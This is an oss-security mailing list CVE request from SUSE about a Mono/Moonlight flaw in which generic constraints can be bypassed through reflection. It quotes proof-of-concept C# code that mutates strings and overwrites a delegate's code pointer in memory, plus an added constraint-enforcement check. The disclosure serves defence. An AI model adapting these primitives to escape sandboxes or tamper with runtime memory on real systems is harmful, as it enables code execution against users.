Message-Id: <201011251552.17678.thomas@suse.de>
Date: Thu, 25 Nov 2010 15:52:17 +0100
From: Thomas Biege <thomas@...e.de>
To: oss-security@...ts.openwall.com
Subject: CVE request: mono/moonlight: execution of arbitrary code due to mutable Strings

Hello.

Just a copy-n-paste from our bugzilla (again):

------------------------------------------------------------------------------
SP 2010-11-24 20:45:21 UTC

Original (pulled by author) blog entry:

So I was messing around with generic methods and discovered that generic
constraints can be bypassed on Mono 2.6.7 and 2.8 using reflection (with the
exception of the new() constraint). One of the fun results of this bug is that
the String class can be made mutable without using reflection to set private
members! The following code demonstrates this; it is legal and will run on
Mono up to and including version 2.8:

using System;
using System.Reflection;

// Layout-compatible stand-in for the managed String object header.
public class FakeString
{
    public int length;
    public char start_char;
}

public class TestCase
{
    // The constraint says T must be a FakeString; on the affected Mono
    // versions it is not enforced when the method is bound via reflection.
    private static FakeString UnsafeConversion<T>(T thing) where T : FakeString
    {
        return thing;
    }

    public static void Main()
    {
        var a = "foo";
        var b = MakeMutable(a);
        Console.WriteLine(a);
        b.start_char = 'b';   // writes into the string's storage
        Console.WriteLine(a);
    }

    private static FakeString MakeMutable(string s)
    {
        var m = typeof(TestCase).GetMethod("UnsafeConversion",
            BindingFlags.NonPublic | BindingFlags.Static);
        // string does not satisfy "where T : FakeString", yet binding succeeds.
        var m2 = m.MakeGenericMethod(typeof(string));
        var d = (Func<string, FakeString>)Delegate.CreateDelegate(
            typeof(Func<string, FakeString>), null, m2);
        return d(s);
    }
}

Comment 1 SP 2010-11-24 20:54:20 UTC

This is a follow up of the previous
https://bugzilla.novell.com/show_bug.cgi?id=654136

The original blog entry allows trusted (by moonlight) code to mutate strings
which could be used to trick policies (e.g. give a valid URL and, once
accepted as a valid xdomain URL, change it to something else). It can also
be extended to arbitrary code execution.

POC by Geoff Norton:

using System;
using System.Reflection;
using System.Runtime.InteropServices;

// Layout-compatible stand-in for the managed Delegate object header.
public class DelegateWrapper
{
    public IntPtr method_ptr;
}

public delegate void MethodWrapper ();

public class BreakSandbox
{
    // Same constraint-bypass pattern as above, applied to a Delegate.
    private static DelegateWrapper Convert <T> (T dingus) where T : DelegateWrapper
    {
        return dingus;
    }

    private static DelegateWrapper ConvertDelegate (Delegate del)
    {
        var m = typeof (BreakSandbox).GetMethod ("Convert",
            BindingFlags.NonPublic | BindingFlags.Static);
        var gm = m.MakeGenericMethod (typeof (Delegate));
        var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate (
            typeof (Func <Delegate, DelegateWrapper>), null, gm);
        return d (del);
    }

    public static void Main (string [] args)
    {
        MethodWrapper d = delegate { Console.WriteLine ("Hello"); };
        d ();
        var converted = ConvertDelegate (d);
        // Overwrite the already WX page with a 'ret'
        Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
        d ();
    }
}

This code won't execute on Moonlight (since all Marshal.* code is
SecurityCritical) but it would not be hard to modify the POC to do the same
without SecurityCritical code.

Note: the bug is present in Mono but does not represent a security
vulnerability there since Mono (unlike Moonlight) can only execute trusted
code.
------------------------------------------------------------------------------

-- 
Thomas Biege <thomas@...e.de>, SUSE LINUX, Security Support & Auditing
SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
--
Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
-- Marie von Ebner-Eschenbach
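As an added check, not part of Thomas Biege's message nor of the Mono or Moonlight code: a small C# probe that asks MakeGenericMethod to bind a type argument violating a "where T : Base" constraint, without ever invoking the bound method. A runtime that enforces constraints at bind time throws ArgumentException; both PoCs above rely on that call succeeding instead. The names ConstraintBase, ConstraintCheck and Probe are chosen here.

```csharp
using System;
using System.Reflection;

// Added check (not from the original report): does this runtime enforce
// generic constraints when a method is bound through reflection?
public class ConstraintBase { }

public static class ConstraintCheck
{
    // Constrained generic method used only as a probe target; never invoked.
    private static ConstraintBase Probe<T>(T value) where T : ConstraintBase
    {
        return value;
    }

    // Returns true when MakeGenericMethod rejects a violating type argument,
    // false when it silently binds (the behaviour the report depends on).
    public static bool RuntimeEnforcesConstraint()
    {
        var m = typeof(ConstraintCheck).GetMethod("Probe",
            BindingFlags.NonPublic | BindingFlags.Static);
        try
        {
            // string does not derive from ConstraintBase, so binding must fail.
            m.MakeGenericMethod(typeof(string));
            return false;
        }
        catch (ArgumentException)
        {
            return true;
        }
    }

    public static void Main()
    {
        Console.WriteLine(RuntimeEnforcesConstraint()
            ? "OK: MakeGenericMethod enforces generic constraints"
            : "WARNING: MakeGenericMethod bound a type that violates its constraint");
    }
}
```

This probes only the MakeGenericMethod bind step; it does not exercise the delegate or memory-write paths shown in the PoCs.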